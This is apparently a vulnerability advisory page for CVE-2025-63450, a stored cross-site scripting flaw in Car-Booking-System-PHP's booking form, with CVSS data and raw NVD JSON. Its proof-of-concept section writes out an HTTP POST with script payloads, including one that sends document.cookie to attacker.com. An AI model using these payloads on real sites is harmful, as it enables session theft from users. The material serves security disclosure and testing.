Security Vulnerability Report
中文
CVE-2025-63450 CVSS 5.4 MEDIUM

CVE-2025-63450

Published: 2025-11-03 16:15:37
Last Modified: 2025-11-07 20:47:10

Description

Car-Booking-System-PHP v.1.0 is vulnerable to Cross Site Scripting (XSS) in /carlux/booking.php.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:* - VULNERABLE
Car-Booking-System-PHP v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63450 PoC - Stored XSS in Car-Booking-System-PHP --> <!-- Target: /carlux/booking.php --> <!-- Submit malicious payload via booking form fields --> <!-- HTTP POST Request --> POST /carlux/booking.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=test%40test.com&phone=1234567890&address=test&car_model=test&booking_date=2025-01-01&days=1&submit=Book+Now <!-- Alternative payloads --> <!-- XSS via event handler --> name=%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E <!-- Cookie stealing payload --> name=%3Cscript%3Edocument.location=%27http://attacker.com/steal?c=%27%2Bdocument.cookie%3C%2Fscript%3E

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63450", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:37.357", "lastModified": "2025-11-07T20:47:09.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Car-Booking-System-PHP v.1.0 is vulnerable to Cross Site Scripting (XSS) in /carlux/booking.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20E6E810-0009-4D9D-828A-68A38A642BEE"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-11", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/shuvo-ahmed-sanin/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}